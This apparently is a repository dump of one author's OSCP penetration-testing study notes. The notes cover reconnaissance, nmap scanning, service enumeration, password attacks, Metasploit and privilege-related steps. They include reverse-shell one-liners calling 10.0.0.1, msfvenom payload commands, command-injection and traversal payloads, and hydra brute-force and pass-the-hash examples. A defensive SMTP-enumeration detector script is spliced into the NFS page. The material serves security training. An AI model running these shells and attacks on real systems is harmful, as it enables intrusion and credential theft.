```text
├── 1.-reconnaissance-osint
│   ├── sock-puppets.md
│   ├── tools.md
│   ├── dns.md
│   ├── information-gathering.md
│   ├── google-hacks.md
│   └── cewl.md
├── 4.-exploitation
│   ├── web-application-attacks
│   │   ├── README.md
│   │   ├── command-injection.md
│   │   ├── directory-traversal.md
│   │   ├── file-inclusion.md
│   │   ├── cross-site-scripting.md
│   │   └── sql-injection.md
│   ├── finding-exploit-code.md
│   ├── password-attacks
│   │   ├── cewl.md
│   │   └── README.md
│   ├── password-attacks.md
│   ├── metasploit.md
│   ├── public-exploits.md
│   ├── active-directory.md
│   └── buffer-overflows.md
├── .gitbook
│   └── assets
│       ├── banner.png
│       ├── image.png
│       ├── image (1).png
│       ├── image (2).png
│       ├── image (3).png
│       ├── image (4).png
│       ├── image (5).png
│       ├── image (1) (1).png
│       ├── image (2) (1).png
│       ├── Twitter Banner.png
│       ├── twitter-banner.png
│       ├── Twitter Banner (1).png
│       ├── twitter-banner (1).png
│       └── New Twitter background.png
├── 6.-miscellaneous
│   └── connections.md
├── 2.-scanning
│   ├── host-discovery.md
│   ├── nmap-scripting-engine.md
│   └── port-scanning-with-nmap.md
├── 3.-enumeration
│   ├── banner-grabbing.md
│   ├── finger-solaris.md
│   ├── 135-rpc.md
│   ├── 25-smtp.md
│   ├── 111-nfs.md
│   ├── 161-udp-snmp.md
│   ├── 53-dns.md
│   ├── 21-ftp.md
│   ├── active-directory.md
│   ├── 22-ssh.md
│   ├── wordpress.md
│   ├── 139-445-netbios-smb.md
│   └── 80-443-http-s.md
├── README.md
├── 5.-maintaining-access
│   ├── shells-1.md
│   ├── msfvenom.md
│   ├── shells.md
│   ├── tunneling.md
│   ├── file-transfers.md
│   ├── windows-privilege-escalation.md
│   └── linux-privilege-escalation.md
├── SUMMARY.md
├── source-zero-con-references.md
└── 7.-walkthroughs
    ├── htb-blunder.md
    ├── thm-hackpark.md
    └── htb-haircut.md
```

/1.-reconnaissance-osint/sock-puppets.md:

# Sock puppets

Coming soon

/4.-exploitation/web-application-attacks/README.md:

# Web application attacks

/4.-exploitation/finding-exploit-code.md:

# Finding exploit code

Updating searchsploit: `searchsploit -u`

Finding exploits: `searchsploit slmail`

[https://www.exploit-db.com/](https://www.exploit-db.com/)

{% hint style="info" %}
Don't forget to search GitHub.
{% endhint %}

/1.-reconnaissance-osint/tools.md:

# Tools

### OWASP Amass

Full-featured reconnaissance tool; the go-to for many bounty hunters.

### Recon-ng - full-featured reconnaissance framework

`Whois_poc` - find POC information

`XSSed` – find XSS vulnerabilities

`Google_site` – search for additional subdomains

/6.-miscellaneous/connections.md:

# Connections

## RDP

```text
xfreerdp /u:username /p:password /cert:ignore /v:IP_ADDRESS
```

### Alternatives

* Remmina (GUI)

## VPN

```text
openvpn filename.ovpn
```

## IRC

* Pidgin Internet Messenger (GUI)

/2.-scanning/host-discovery.md:
# Host discovery

COMING SOON

### VHOST discovery

#### ffuf

```
ffuf -w wordlist.txt -u http://somesite.com -H "Host: FUZZ.somesite.com"
```

Ping sweep with Nmap:

```
nmap -sn 10.11.1.1-254
```

Sweeping for specific open ports:

```
nmap -p 80 10.11.1.1-254
```

/3.-enumeration/banner-grabbing.md:

# Banner grabbing

Service versions can be identified through scanning or through a technique known as "banner grabbing." When banner grabbing, we establish a connection to the service in question and attempt to retrieve information from it, which often includes the version.

```text
nc 10.11.1.5 4445
telnet 10.10.10.10 port
```

/3.-enumeration/finger-solaris.md:

# Finger (Solaris)

List users:

```text
finger @$TargetIP
```

Query for the existence of specific users:

```text
finger root@$TargetIP
```

Brute-force user enumeration: download pentestmonkey's enumeration script.

{% embed url="https://github.com/pentestmonkey/finger-user-enum" %}

```text
perl finger_user_enum.pl -U /usr/share/wordlists/Users.txt -t $TargetIP
```

/4.-exploitation/password-attacks/cewl.md:

# CeWL

CeWL is a Ruby tool that spiders webpages and outputs wordlists for use with other brute-force tools.

### CeWL - scraping webpages

```text
cewl [options]
Example: cewl -m 6 -w megacorp-cewl.txt www.megacorpone.com
-d = depth to spider, default 2
-m = minimum word length, default 3
-w = write the output to file, include file name
-c = count, show word count for each word entry
-v = verbose
```

/README.md:

# Welcome

Hello and welcome. This page started as a simple collection of notes developed while working towards the OSCP. I continue to add to the collection and make updates as I continue to learn and progress in ethical hacking.

The site and resources are organized by the phases of an ethical hacking engagement. Some of these resources are more thoroughly developed, but the entire site will likely always be a work in progress.
![](<.gitbook/assets/New Twitter background.png>)

/1.-reconnaissance-osint/dns.md:

# DNS

#### Enumeration

```text
whois nintendo.com
whois 50.7.67.186
host -t ns megacorpone.com (nameservers)
host -t mx megacorpone.com (mail servers)
host www.megacorpone.com (web server)
```

#### Zone transfers

```text
host -l megacorpone.com ns1.megacorpone.com
dig axfr @10.10.10.10 Domain.com
```

#### Automated tools

```text
dnsrecon -d megacorpone.com -t axfr
dnsenum zonetransferme.com
```

/3.-enumeration/135-rpc.md:

# 135 - RPC

### Enumeration

```
nmap -n -v -sV -Pn -p 135 --script=msrpc-enum 192.168.1.10
```

### rpcclient

```
rpcclient -U user $targetip
rpcclient -U "" $targetip
```

### rpcdump.py

Part of the Impacket suite; useful for enumerating RPC endpoints.

```
/opt/impacket/examples/rpcdump.py username:password@target-ip
```

### lookupsid.py

```
/opt/impacket/examples/lookupsid.py username:password@target-ip
```

/3.-enumeration/25-smtp.md:

# 25 - SMTP

We can attempt to enumerate SMTP by connecting to the service and then using basic commands to gather information.

### Connecting

```
nc -nv $targetip 25
telnet $targetip 25
```

### Enumeration

```
VRFY user - asks the server to verify an email address
EXPN - asks the server for the membership of a mailing list
```

### NSE scripts

```
smtp-commands.nse -- lists available SMTP commands
smtp-enum-users.nse -- attempts to enumerate users using the VRFY, EXPN or RCPT TO commands
smtp-open-relay.nse -- tests whether authentication is required to send emails
smtp-vuln-cve2010-4344.nse
smtp-vuln-cve2011-1720.nse
smtp-vuln-cve2011-1764.nse
```

/2.-scanning/nmap-scripting-engine.md:

# Nmap Scripting Engine

Scripts are stored in `/usr/share/nmap/scripts`.

```
locate *.nse | grep smb
```

Banner grabbing:

```
nmap --script banner 10.10.10.5
```

Vulnerability scanning:

```
nmap -sV --script vulners [--script-args mincvss=]
nmap --script vuln 10.10.10.5
nmap -p 139,445 --script=$scriptname $targetip
```

With wildcards:

```
nmap -p 139,445 --script=smb-vuln* $targetip
nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254
nmap -v -p 139,445 --script=smb-security-mode 10.11.1.236
```

To learn more about specific scripts:

```
nmap --script-help scriptname
```

/3.-enumeration/111-nfs.md:

# 111 - NFS

### Network File System

NFS is a distributed file system protocol for sharing files over a network. It is often used with UNIX operating systems and is predominantly insecure in its implementation.
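The VRFY/EXPN/RCPT TO probing this section describes, seen from the mail server's side. This is an added example and not code from the Pentesting-notes repo: it parses a constructed log of SMTP sessions and flags the sessions that send many probes and get mostly 5xx rejections, which is what user enumeration looks like in the logs. The log format (session id, C/S direction, line text), the addresses and the thresholds are assumptions made for this example.

```python
"""Detect SMTP user enumeration (VRFY/EXPN/RCPT TO probing) in a session log.
Added example; the log format, addresses and thresholds are constructed."""
import re
from collections import defaultdict

# Constructed transcript: "<session-id> <C|S> <line>", C = client command, S = server reply.
SAMPLE_LOG = """\
s1 C HELO scanner.example.test
s1 S 250 mx.example.test
s1 C VRFY root
s1 S 252 2.0.0 root
s1 C VRFY admin
s1 S 550 5.1.1 admin... User unknown
s1 C VRFY backup
s1 S 550 5.1.1 backup... User unknown
s1 C EXPN staff
s1 S 550 5.1.1 staff... Mailing list unknown
s1 C VRFY www
s1 S 550 5.1.1 www... User unknown
s1 C VRFY postmaster
s1 S 252 2.0.0 postmaster
s2 C EHLO laptop.example.test
s2 S 250 mx.example.test
s2 C MAIL FROM:<alice@example.test>
s2 S 250 2.1.0 Ok
s2 C RCPT TO:<bob@example.test>
s2 S 250 2.1.5 Ok
s2 C DATA
s2 S 354 End data with <CR><LF>.<CR><LF>
"""

LINE_RE = re.compile(r"^(?P<sid>\S+) (?P<dir>[CS]) (?P<text>.*)$")
# The three commands the smtp-enum-users NSE script uses for the same purpose.
PROBE_RE = re.compile(r"^(VRFY|EXPN|RCPT TO)\b", re.IGNORECASE)


def parse_sessions(log_text):
    """Group (direction, text) pairs by session id, preserving order."""
    sessions = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            sessions[m["sid"]].append((m["dir"], m["text"]))
    return sessions


def probe_stats(events):
    """Count enumeration probes in one session and how many the server rejected (5xx)."""
    probes = rejected = 0
    awaiting_reply = False
    for direction, text in events:
        if direction == "C":
            awaiting_reply = bool(PROBE_RE.match(text))
            if awaiting_reply:
                probes += 1
        elif direction == "S" and awaiting_reply:
            if text.startswith("5"):
                rejected += 1
            awaiting_reply = False
    return {"probes": probes, "rejected": rejected}


def summarize(log_text):
    """Per-session probe statistics for the whole log."""
    return {sid: probe_stats(events) for sid, events in parse_sessions(log_text).items()}


def flag_enumeration(log_text, min_probes=5, min_reject_ratio=0.5):
    """Session ids that look like user enumeration: many probes, mostly rejected.
    A normal delivery (one RCPT TO, accepted) never reaches the threshold."""
    flagged = []
    for sid, stats in summarize(log_text).items():
        if stats["probes"] >= max(1, min_probes) and \
                stats["rejected"] / stats["probes"] >= min_reject_ratio:
            flagged.append(sid)
    return flagged


if __name__ == "__main__":
    for sid, stats in summarize(SAMPLE_LOG).items():
        print(sid, stats)
    print("flagged:", flag_enumeration(SAMPLE_LOG))
```

Session `s1` is flagged (six probes, four rejected); `s2`, a normal delivery with a single accepted `RCPT TO`, is not. On the mitigation side, Postfix can refuse VRFY outright with `disable_vrfy_command = yes` in `main.cf`, which removes the cheapest of the three probes; RCPT TO probing still has to be handled by rate limiting or recipient verification policy.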
Portmapper and rpcbind both listen on port 111 and redirect clients to the appropriate ports, often TCP 2049.

#### Scan with Nmap or use NSE scripts to locate NFS shares

```
nmap -v -p 111 10.11.1.1-254
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
```

#### Enumeration

```
nmap -p 111 --script nfs* $RHOST
nmap -sV -p 111 --script=rpcinfo $RHOST
nmap -p 111 --script nfs* 10.11.1.72
rpcinfo -p $targetip
rpcbind $targetip
```

#### Mounting shares

```
showmount --exports $target_ip
mount -o nolock $target_ip:/ /mnt
```

If files aren't readable, you may be able to create a new local user, then use `sed` to change that user's UID to match the UID that owns the files, and switch to it (`su username`).

/4.-exploitation/web-application-attacks/command-injection.md:

# Command injection

Command injection occurs when flaws in a web application allow the execution of OS commands. This typically happens because inputs are not properly sanitized, allowing attackers to change or add to the commands that are executed.

* To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands
* Use command-line symbols in input fields to test for command injection
  * `;` (used to separate commands in Bash)
  * `|`
  * `||` (second command runs if the first fails)
  * `&`
  * `&&` (second command runs if the first succeeds)
  * `>`
  * `>>`
* Be sure to use commands specific to the target OS
  * `cat` vs. `type`
  * `ping` vs. `ping -c`
  * `ls` vs. `dir`

#### Payloads

```
command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd
command; type C:\Windows\win.ini
Blind:
command; ping -c5 $ipaddress
```

/3.-enumeration/161-udp-snmp.md:

# 161 (UDP) - SNMP

### Simple Network Management Protocol

SNMP is commonly misunderstood, which results in misconfigurations.

```
nmap -sU --open -p 161 10.11.1.1-254
onesixtyone 10.11.1.1/24
```

### snmp-check

```
snmp-check $targetip
```

### snmpwalk

#### V1 enumeration (entire MIB tree)

```
snmpwalk -c public -v1 -t 10 $ipaddress
snmpwalk -c private -v1 -t 10 $ipaddress
snmpwalk -c manager -v1 -t 10 $ipaddress
```

#### Enumeration

```
snmpwalk -c public -v1 $ipaddress 1.3.6.1.4.1.77.1.2.25 (users)
snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.1.6.0 (processes)
snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.4.2.1.2 (running programs)
snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.2.3.1.4 (storage units)
snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.6.13.1.3 (tcp local ports)
snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.6.3.1.2 (software)
```

### onesixtyone

```
onesixtyone $targetip
```

/4.-exploitation/web-application-attacks/directory-traversal.md:

# Directory traversal

Directory traversal allows attackers to gain access to files outside of the web root that should not be accessible through the web application.
These attacks result in _information disclosure_ and occur when attackers are able to manipulate file paths.

#### Detection

Directory traversal vulnerabilities are often identified through the presence of file names and extensions in URL parameters.

```
10.14.2.55/menu.php?file=index.php
```

If the user input is not validated, we may be able to modify the file path using `../` or `..\`, and then attempt to access system files that should not be accessible through the web application.

```
Linux - /etc/passwd
Windows - c:\boot.ini
Windows - c:\windows\win.ini
Windows - c:\windows\system32\drivers\etc\hosts
```

If input is validated, for example if dots and slashes are restricted, try URL, double URL, and Unicode encoding to bypass these filters.

```
URL encoding: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```

/5.-maintaining-access/shells-1.md:

# Shells

{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %}

### Bash

```text
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

### Netcat

```text
nc -e /bin/sh 10.0.0.1 1234
```

### Netcat (without -e)

```text
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

### Perl

```text
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### Python

```text
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### PHP

```text
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

'& /dev/tcp/192.168.119.124/4445 0>&1\"\'); ?>'
```

/5.-maintaining-access/msfvenom.md:

# MSFvenom

### Commands

```text
-p Selects the payload
-l List modules (payloads, encoders, nops, all)
-n Prepend a NOP sled to the payload
-f Output format
-e Encoder
-s Maximum space for the payload
-a Architecture
-b Bad characters
--platform Platform
```

#### Windows staged payloads

```text
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
```

#### Windows non-staged payloads

```text
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
```

#### Meterpreter payloads

```text
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```

Using ExitThread instead of ExitProcess can help prevent crashing the exploited program.

```text
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
```

/5.-maintaining-access/shells.md:

# Upgrading simple shells

### Spawning a TTY

If Python is present on the target machine, the first method below is very reliable. Otherwise, the other options are worth trying but don't always work.

```text
python -c "import pty; pty.spawn('/bin/bash')"
```

{% hint style="info" %}
Be sure to check for other versions of Python!
{% endhint %}

```text
echo os.system('/bin/bash')
```

```text
/bin/sh -i
```

### Tab auto-completion

The following commands will give tab auto-completion, but other features such as SIGINT, history, and clearing the screen will not work.

```text
CTRL + Z (background the session)
stty raw -echo
fg
reset
```

### Full TTY

The following commands will correct formatting errors and provide the remaining features, including SIGINT, history, and the ability to clear your screen.

```text
# on attack machine
stty -a (note number of rows and columns)
echo $TERM

# on target machine
export TERM=xterm-256color (match term from attack machine)
stty rows XX columns XXX (match from attack machine)

echo $SHELL -- if not bash, export SHELL=bash
```

/3.-enumeration/53-dns.md:

# 53 - DNS

### Enumeration

Note: Many of the techniques below can also be accomplished using DNS repositories such as [DNSdumpster.com](https://dnsdumpster.com/).

### nslookup

```
nslookup $domain.com
nslookup $ipaddress (reverse lookup)
```

### dig

```
Basic syntax: dig @[nameserver] somesite.com [options]
dig somesite.com -t any (all available records)
dig somesite.com -t mx (mx records only)
dig somesite.com -t axfr (zone transfer)
dig -x $ipaddress (reverse lookup)
```

### host
```
host www.somesite.com (web server)
host -t ns somesite.com (nameservers)
host -t mx somesite.com (mail servers)
host -l somesite.com ns1.somesite.com (zone transfer)
```

### Automated tools

#### DNSRecon

```
dnsrecon -d somesite.com -t axfr
dnsrecon -r CIDR (reverse DNS lookup of net block)
-d: used to specify domain name
-r: IP range for reverse lookup
-t: used to specify the type of enumeration
Common types include:
std - SOA, NS, A, AAAA, MX and SRV
axfr - test all nameservers for zone transfer
brt - brute force domains and hosts using a given dictionary
```

#### DNSenum

```
dnsenum $domain.com
```

/3.-enumeration/21-ftp.md:

# 21 - FTP

FTP versions are typically fairly secure. Check for anonymous login capability; if present, enumerate whatever you have access to.

* Version info (banner grab)
* Anonymous logins - surprisingly common, especially in CTFs

```text
ftp 10.11.1.5
```

{% hint style="warning" %}
Remember to place FTP into the proper mode when transferring files (binary for executable files and ASCII for text documents). Use "binary" and "ascii" to change modes.
{% endhint %}

#### Basic commands

FTP uses many basic Linux-style commands; below are the most common.

```text
ls - list directory contents
cd - change directory
get - copy file from remote to local
mget - copy multiple files from remote to local
put - copy file from local to remote
mput - copy multiple files from local to remote
delete - remove a file
pwd - print working directory on remote machine
bye/quit - exit ftp
```

#### Moving files

Some FTP servers (ProFTPD) are misconfigured and allow you to move files without authenticating. If your enumeration uncovers file locations, you can use the commands below to try to copy these files from inaccessible locations to areas you may have access to (SMB shares, NFS, etc.).

```text
SITE CPFR /path/to/file.txt
SITE CPTO /path/you/choose/file.txt
```

/5.-maintaining-access/tunneling.md:

# Tunneling/Port forwarding

### Linux

#### Local port forwarding

```
ssh -L [LOCAL_PORT]:[REMOTE_HOST]:[REMOTE_PORT] [USER]@[SSH_SERVER]
```

#### Remote port forwarding

```
ssh -R [REMOTE_PORT]:[LOCAL_HOST]:[LOCAL_PORT] [USER]@[SSH_SERVER]
```

#### Dynamic port forwarding

```
ssh -D [LOCAL_PORT] -p [SSH_PORT] [USER]@[SSH_SERVER]
```

HTTP tunneling – a technique to encapsulate a protocol within HTTP

```
HTTPTunnel or stunnel
```

### Windows

#### Netsh

Netsh is installed on Windows by default, but port proxying requires the IP Helper service and IPv6 to be installed (both are enabled by default).

```
netsh interface portproxy add v4tov4 listenport=$port listenaddress=$ip connectport=$port connectaddress=$ip
```

{% hint style="info" %}
A firewall rule may be required to open the desired port.
{% endhint %}

```
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=$ip localport=$port action=allow
```

#### Plink.exe

```
plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4
```

```
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080
```

### Meterpreter

```
portfwd add -l [LOCAL_PORT] -p [REMOTE_PORT] -r [REMOTE_HOST]
portfwd add -l 3306 -p 3306 -r 192.168.1.10
```

/4.-exploitation/password-attacks.md:

# Password attacks

#### `/usr/share/wordlists`

### Medusa

Brute-force basic HTTP authentication.

```
medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10
```

### Hydra

Can be used to brute-force numerous services.

```
hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin
```

#### Brute-force HTTP POST login forms

```
Format: hydra -L [USER_LIST] -P [PASS_LIST] [TARGET] http-post-form "[PATH]:[POST_BODY]:[FAILURE_STRING]"

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
```

### John the Ripper

```
john --wordlist=/usr/share/wordlists/rockyou.txt [HASH_FILE]
```

#### SSH keys

To crack SSH key passphrases, convert the key to a hash, then crack it using John.

```
python ssh2john.py id_rsa > id_rsa.hash
```

### Hashcat

**Check for the mode on the wiki page:** [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)

```
hashcat -m (mode) -a 0 hash.txt Pass.txt
```

### Passing the hash (Windows)

Create an environment variable SMBHASH containing the hash we want to pass:

`export SMBHASH=hashvalue`

Use pth-winexe to authenticate:

`pth-winexe -U administrator% //10.11.0.176 cmd`

/2.-scanning/port-scanning-with-nmap.md:

# Port scanning with Nmap

Nmap is easily one of the most popular penetration testing tools. While it started as a simple port scanner, the tool has grown immensely and now performs many functions. Knowing how to use Nmap's options to produce the desired level of detail in your scans is incredibly useful. Below are some example scan commands, as well as a list of the most commonly used options.

#### My preferred scans

```
# Quick/standard scan
nmap -sC -sV 10.11.1.5
# Deep scan
nmap -p- -sC -sV 10.11.1.5
# UDP scan
nmap -sU -F 10.11.1.5
```

#### Scan types

```
-sT = TCP connect scan
-sS = TCP SYN (stealth) scan
-sU = UDP scan
-sn = host discovery only (no port scan)
-sN = null scan (no flags set, may help on firewalled systems)
-sX = Xmas tree scan (FIN, PSH, URG flags)
```

#### Other important flags

```
-sC = runs default scripts
-sV = attempts to identify the version of the service running on a port
-O = attempts OS detection using TCP/IP fingerprinting
-A = includes -sC, -sV, -O
-p = used to specify ports
-p- = scans all ports, not just the top 1,000 default ports
--top-ports=20 = scans the top 20 ports; the number can be changed
-Pn = skip host discovery and scan all addresses
-T = enables timing options (0-5, default: 3)
-v = increases the verbosity; nmap prints results while the scan is in progress
```

#### Input list of hosts from file

```
-iL = scans the list of IP addresses contained in a txt file
```

#### Outputting scan results

```
-oN = outputs results in normal txt format
-oG = outputs results in greppable format
-oX = outputs results in XML format
-oS = outputs results in script kiddie format
-oA = outputs results in all formats
```

--------------------------------------------------------------------------------
/3.-enumeration/active-directory.md:
--------------------------------------------------------------------------------
# Active Directory

### Enumeration

There are numerous tools available for enumerating Active Directory environments. For the OSCP, I recommend picking one or two tools, getting familiar with them in the lab environment, and sticking with them through the exam. After you have earned the OSCP you can explore additional tools and expand your Active Directory knowledge. For my OSCP journey my AD enumeration tool of choice was PowerView.ps1.

#### Bloodhound

```
pip install bloodhound
bloodhound-python -u user -p pass -d domain -c All
```

#### PowerView

To use PowerView we first need to modify the PowerShell execution policy to enable script execution.

```
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
# or
Set-ExecutionPolicy -ExecutionPolicy Bypass
```

Next, dot source the script.

```
. .\script.ps1
# be sure to include the space between the two dots
```

#### Basic enumeration (PowerView.ps1)

```
Get-Domain
Get-DomainPolicy
(Get-DomainPolicy).KerberosPolicy
Get-DomainController
Get-DomainUser -Identity student1
Get-NetUser -SPN                     # Kerberoastable users
Get-NetUser -PreauthNotRequired      # AS-REP Roastable users
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainComputer
Get-DomainComputer | select Name
Get-NetComputer -Unconstrained       # unconstrained delegation (author's note: need to verify)
Get-DomainUser
Get-DomainUser | select samaccountname
Get-DomainUser -SPN | select serviceprincipalname
Get-NetLoggedon -ComputerName name   # requires local admin rights
Get-DomainGPO
Get-DomainOU | select name
```

#### User hunting

```
Find-LocalAdminAccess -Verbose               # finds all machines on the domain where the current user has local admin access
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity   # find computers where a domain admin (or the specified user/group) has sessions
```

--------------------------------------------------------------------------------
/3.-enumeration/22-ssh.md:
--------------------------------------------------------------------------------
# 22 - SSH

SSH is not typically vulnerable, but it is often a candidate for password reuse attacks. When enumerating you should check for:

* Version info (banner grab)

```
ssh 10.10.10.5
```

### NSE scripts

```
ssh2-enum-algos.nse -- reports algorithms supported
ssh-auth-methods.nse -- provides methods available for authentication
sshv1.nse -- checks for ssh v1 support
```

### Username enumeration (CVE-2018-15473)

OpenSSH versions prior to and including version 7.7 are vulnerable to username enumeration because there is no delay for invalid users. This makes it possible to conduct a timing attack to identify valid users.

```
To conduct this attack load Metasploit module scanner/ssh/ssh_enumusers
Set the RHOSTS, RPORT, and USERNAME or USER_FILE options
If using a USER_FILE, any from /usr/share/seclists/Usernames will do
```

### SSH keys

When enumerating other services/shares, you should also look for SSH keys. Public keys are commonly stored as "authorized_keys", and private keys are commonly stored as "id_rsa". If you locate a private key you may be able to connect to the remote system via SSH.

```
chmod 600 id_rsa
ssh -i id_rsa user@10.10.10.5
```

### Credential reuse

You should also attempt to connect to SSH with any credentials that you discover.

```
ssh user@10.10.10.5
```

### Creating keys (post exploitation)

```
ssh-keygen
```

### scp (file transfers over ssh)

```
scp -r username@target-ip:/path/to/foo /home/username/desktop/
```

### Specifying key exchange algorithms

Occasionally on older systems you'll receive an error indicating that no compatible key exchanges were found. Use the following command(s) to force the use of a specific algorithm.

```
ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@$TargetIP
ssh -o HostKeyAlgorithms=+ssh-rsa root@$TargetIP
```

--------------------------------------------------------------------------------
/4.-exploitation/metasploit.md:
--------------------------------------------------------------------------------
# Metasploit

## Msfconsole

### Exploring

Start: `msfconsole`

View auxiliary modules: `show auxiliary`

Use modules: `use auxiliary/scanner/snmp/snmp_enum`

View module options: `show options`

Set global session values: `setg RHOSTS 10.11.1.5`

### Database access

MSF logs findings and information about discovered hosts in a database.

View discovered hosts: `hosts`

Use the db_nmap wrapper to scan: `db_nmap 10.11.1.5`

Search for machines with a given open port: `services -p 443`

### Exploit modules

Search exploits: `search pop3`

Use exploit: `use exploit/windows/pop3/seattlelab_pass`

View options: `show options`

Set options: `set RHOST 10.11.1.5`

View payloads: `show payloads`

Select payload: `set payload windows/shell/reverse_tcp`

View payload options: `show options`

Once configured, run the exploit: `exploit`

### **Multi Handler**

Used to receive callbacks from meterpreter payloads.

`use exploit/multi/handler`

Set the payload to match the msfvenom command used to generate the shell.

Set the IP address and port.

`run`

### Meterpreter payloads – provide additional features and functionality

View system info: `sysinfo`

View UID: `getuid`

Search files: `search string`

Upload files: `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec` (the doubled backslashes are required to prevent shell escaping)

Download files: `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`

Invoke a command shell: `shell`

### Post exploitation

`help` displays a list of available meterpreter post exploitation commands.

Includes: download, upload, portfwd, route, keyscan_start/stop, screenshot, record_mic, webcam_snap, getsystem (priv esc), hashdump

Useful tool for finding priv esc options: `use post/multi/recon/local_exploit_suggester`

--------------------------------------------------------------------------------
/5.-maintaining-access/file-transfers.md:
--------------------------------------------------------------------------------
# File transfers

Once we gain initial access to our target we may need to upload additional tools to help us elevate privileges or provide easier methods of accessing the machine at a later point. We might also want to download files from the target for use in our report. The following list provides a few common techniques for executing file transfers.

### Hosting files via HTTP

On our attacking machine we have two options for serving files. The first (preferred) method is to run the SimpleHTTPServer Python module in the directory that contains the files we want to transfer.

```
python3 -m http.server 80
python -m SimpleHTTPServer 80
```

Our second option is to use our built-in Apache server. To do this we need to start the Apache 2 service. Once started, our files will be served from /var/www/html.

```
systemctl start apache2
```

Next, we use our target machine to request the desired file from the server. The method varies slightly depending on the OS of the target machine.

### **Built-in OS functions**

#### **Linux**

```
wget http://sample.com/file.pdf
wget -O report_wget.pdf https://sample.com/report-2013.pdf
# -O saves the file with a different name on the local machine
curl -o file.pdf http://attackerip/file.pdf
axel -a -n 20 -o report_axel.pdf https://sample.com/report.pdf
# -n  specifies the number of connections
# -a  provides a more concise progress indicator
# -o  specifies a different name for the downloaded file
```

#### **Windows**

```
certutil -urlcache -f http://sourceip/file.exe [c:\desired_destination\]name.exe
```

### Other alternatives

#### FTP

Create an FTP server in the directory you are in, on port 21, allowing anonymous access:

```
sudo python -m pyftpdlib -p 21
ftp $IPaddressofattacker
```

#### Netcat

On the receiving machine: `nc -nlvp 4444 > incoming.exe`

On the sending machine: `nc -nv 10.11.23.33 4444 < file.exe`

--------------------------------------------------------------------------------
/3.-enumeration/wordpress.md:
--------------------------------------------------------------------------------
# Wordpress

### Manual enumeration

* Enumerate users by reviewing the archives and taking note of the authors of blog posts
* If you identify a login page, attempt to log in with common credentials (admin, password, etc.).
* Pay attention to errors produced through failed logins

### wpscan

wpscan is an open source scanner included with Kali.

If you use another distro you can download it here: [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan)

Documentation here: [https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation](https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation)

#### Enumerating users

```text
wpscan --url https://target.tld/ --enumerate u
wpscan --url example.com -e u
wpscan --url https://target.tld/ --enumerate u1-100
```

#### Brute force

```text
wpscan --url example.com -e u --passwords /path/to/password_file.txt
```

```text
wpscan --url example.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50
```

#### Scanning plugins

```text
wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN
```

#### Enumeration modes

To enumerate version, plugins or themes, select from three modes: `passive`, `aggressive`, `mixed`. The default is `mixed` for most items, and `passive` for plugin detection. To override the default use the `--plugins-detection` option.

```text
Mixed - provides the most results
Passive - useful when server overload is a concern
Aggressive - most aggressive
```

#### Other enumeration options

The following enumeration options are available and should be preceded by the `-e` flag. If no additional options are provided the default is: `vp,vt,tt,cb,dbe,u,m`

